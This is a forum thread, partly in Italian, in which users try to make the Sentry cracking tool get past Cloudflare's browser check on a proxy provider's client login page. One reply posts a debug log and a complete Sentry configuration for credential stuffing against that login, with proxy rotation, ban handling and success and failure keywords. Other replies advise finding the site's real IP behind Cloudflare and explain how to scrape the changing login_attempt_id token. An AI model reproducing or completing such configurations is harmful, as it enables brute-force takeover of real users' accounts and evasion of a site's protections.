Jump to content
  • 0

Sentry con cloudfare


Ris93

Question

Come da titolo volevo sapere se era possibile in qualche modo aggirare la protezione di cloudfare con sentry, perchè al momento mi da sempre errore 503 

Link to comment
Share on other sites

7 answers to this question

Recommended Posts

  • 0
1 hour ago, Ris93 said:

Come da titolo volevo sapere se era possibile in qualche modo aggirare la protezione di cloudfare con sentry, perchè al momento mi da sempre errore 503 

Try to find the real IP of the Site ( not the Cloudflare camuflage IP .... )

what is the site ?

Link to comment
Share on other sites

  • 0
-----------------------------------------
Site: https://stormproxies.com/clients/login
Debug of BOT 1
Proxy: 127.0.0.1
-----------------------------------------

<-----Bot Status: Posting----->
<-----Sent Headers----->
CONNECT stormproxies.com:443 HTTP/1.0
User-Agent: Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.0 Version/10.00
Host: stormproxies.com
Proxy-Connection: Keep-Alive
Content-Length: 0


<-----Bot Status: Posting----->
<-----Sent Headers----->
POST /clients/login HTTP/1.1
Accept: */*
Referer: https://stormproxies.com
User-Agent: Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.0 Version/10.00
Host: stormproxies.com
Pragma: no-cache
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Post Data:
amember_login=dfgdsgdsf&amember_pass=fdgsdgfdsgf&login_attempt_id=1501412118&=Login


<-----Received Headers----->
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sun, 30 Jul 2017 18:23:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Set-Cookie: __cfduid=dae2d2075b2267f2d5b7cdb57489402fa1501439026; expires=Mon, 30-Jul-18 18:23:46 GMT; path=/; domain=.stormproxies.com; HttpOnly

X-Frame-Options: SAMEORIGIN
Refresh: 8;URL=/cdn-cgi/l/chk_jschl?pass=1501439030.119-a4dyGIMmmF
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 386a59d93da63db9-MXP



<-----Received Source----->
<!DOCTYPE HTML>
<html lang="en-US">
<head>
  <meta charset="UTF-8" />
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
  <meta name="robots" content="noindex, nofollow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>Just a moment...</title>
  <style type="text/css">
    html, body {width: 100%; height: 100%; margin: 0; padding: 0;}
    body {background-color: #ffffff; font-family: Helvetica, Arial, sans-serif; font-size: 100%;}
    h1 {font-size: 1.5em; color: #404040; text-align: center;}
    p {font-size: 1em; color: #404040; text-align: center; margin: 10px 0 0 0;}
    #spinner {margin: 0 auto 30px auto; display: block;}
    .attribution {margin-top: 20px;}
    @-webkit-keyframes bubbles { 33%: { -webkit-transform: translateY(10px); transform: translateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: translateY(-10px); } 100% { -webkit-transform: translateY(0); transform: translateY(0); } }
    @keyframes bubbles { 33%: { -webkit-transform: translateY(10px); transform: translateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: translateY(-10px); } 100% { -webkit-transform: translateY(0); transform: translateY(0); } }
    .bubbles { background-color: #404040; width:15px; height: 15px; margin:2px; border-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ease-in-out; animation:bubbles 0.6s 0.07s infinite ease-in-out; -webkit-animation-fill-mode:both; animation-fill-mode:both; display:inline-block; }
  </style>

    <script type="text/javascript">
  //<![CDATA[
  (function(){
    var a = function() {try{return !!window.addEventListener} catch(e) {return !1} },
    b = function(b, c) {a() ? document.addEventListener("DOMContentLoaded", b, c) : document.attachEvent("onreadystatechange", b)};
    b(function(){
      var a = document.getElementById('cf-content');a.style.display = 'block';
      setTimeout(function(){
        var s,t,o,p,b,r,e,a,k,i,n,g,f, kvLFAnc={"n":+((!+[]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]))};
        t = document.createElement('div');
        t.innerHTML="<a href='/'>x</a>";
        t = t.firstChild.href;r = t.match(/https?:\/\//)[0];
        t = t.substr(r.length); t = t.substr(0,t.length-1);
        a = document.getElementById('jschl-answer');
        f = document.getElementById('challenge-form');
        ;kvLFAnc.n*=+((!+[]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]));kvLFAnc.n*=+((!+[]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]));kvLFAnc.n+=+((!+[]+!![]+!![]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]));kvLFAnc.n*=+((!+[]+!![]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]));kvLFAnc.n-=!+[]+!![]+!![]+!![]+!![]+!![]+!![];kvLFAnc.n*=+((!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]));kvLFAnc.n*=+((!+[]+!![]+[])+(+!![]));a.value = parseInt(kvLFAnc.n, 10) + t.length; '; 121'
        f.submit();
      }, 4000);
    }, false);
  })();
  //]]>
</script>


</head>
<body>
  <table width="100%" height="100%" cellpadding="20">
    <tr>
      <td align="center" valign="middle">
          <div class="cf-browser-verification cf-im-under-attack">
  <noscript><h1 data-translate="turn_on_js" style="color:#bd2426;">Please turn JavaScript on and reload the page.</h1></noscript>
  <div id="cf-content" style="display:none">
    
    <div>
      <div class="bubbles"></div>
      <div class="bubbles"></div>
      <div class="bubbles"></div>
    </div>
    <h1><span data-translate="checking_browser">Checking your browser before accessing</span> stormproxies.com.</h1>
    
    <p data-translate="process_is_automatic">This process is automatic. Your browser will redirect to your requested content shortly.</p>
    <p data-translate="allow_5_secs">Please allow up to 5 seconds&hellip;</p>
  </div>
   
  
<form id="challenge-form" action="/cdn-cgi/l/chk_jschl" method="get">
    <input type="hidden" name="jschl_vc" value="a4629a76b64335c7bf6faec729c2489b"/>
    <input type="hidden" name="pass" value="1501439030.119-a4dyGIMmmF"/>
    <input type="hidden" id="jschl-answer" name="jschl_answer"/>
  </form>

</div>

          
          <div class="attribution">
            <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=iuam" target="_blank" style="font-size: 12px;">DDoS protection by Cloudflare</a>
            <br>
            Ray ID: 386a59d93da63db9
          </div>
      </td>
     
    </tr>
  </table>
</body>
</html>



<-----Bot Status: 503 - Service Temporarily Unavailable----->

this is config 

[Settings]
SiteURL=https://stormproxies.com/clients/login
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
UsernameStart=6
UsernameEnd=8
PasswordStart=6
PasswordEnd=8
ComboMode=0
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
EmailFilter=0
EmailMode=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowProxies=10
BanWindowRatio=10
blnNoProxies=1
RequestMethod=2
Referer=1
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://stormproxies.com|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
POSTData=amember_login=<USER>&amember_pass=<PASS>&login_attempt_id=1501412118&=Login
[Form]
IAParse=0
blnBasic=0
Action=https://stormproxies.com/clients/login
Username=amember_login
Password=amember_pass
Email=
CustomData=
NoIndex=
AddData=login_attempt_id=1501412118&=Login
Cookie=
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=
RedPostData=
LoginPostData=
RedKeys=
DataDesc=
CaptureParsingCode=
RefreshSession=0
RefreshCookie=0
IAMethod=2
POSTMethod=2
RedMethod=1
LoginMethod=1
AjaxHeader=0
FormHeader=0
RedHeader=0
LoginHeader=0
ImageAfterAjax=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1
[Ajax]
Variables=
PostElements2=
RedURL=
[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng
[Keywords]
HeaderFail=
HeaderSuccess=
HeaderBan=
HeaderRetry=
SourceFail={"ok":false,"error":["The user name or password is incorrect"],"code":-6,"html":"
SourceSuccess={"ok":true,
SourceBan=
SourceRetry=
EnableHeaderFail=0
EnableHeaderSuccess=0
EnableHeaderBan=0
EnableHeaderRetry=0
EnableSourceFail=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceRetry=0
EnableGlobalSourceRetry=1
[Fake]
AfterFP=1
FollowRedirect=1
EnableConHits=0
Success=3
ConHits=10
EnableConLength=0
SourceTags=1
ConLength=200
blnSuccess=0
SuccessRetries=3
blnForbToOK=0
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3
blnCompleteNot=1
HTTPFollow=1
blnProcessErrors=1
blnInvalidPath=1
UserField=0

 

Link to comment
Share on other sites

  • 0

-----------------------------------------
Site: https://stormproxies.com/clients/login
Debug of BOT 1
Proxy: 127.0.0.1   <-------  Fiddler :Others01:
-----------------------------------------

better u waiting a ConfigMasta , i don't find a valid solution at the moment

P.S: login_attempt_id=xxxxxxxxxxx   it can change everytime , u find it in the body response of the Login Page 

<input type="hidden" name="login_attempt_id" value="1501448983" />
Link to comment
Share on other sites

  • 0

thanks i did not see 

thanks yuoi anyway for the help 

Link to comment
Share on other sites

  • 0
On 7/31/2017 at 0:46 AM, Ris93 said:

thanks i did not see

Firefox + Firebug add-ons

Screenshot_3.png

Screenshot_2.thumb.png.f4296608c762eceb78b3f3212d942244.png

Edited by jankko60
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...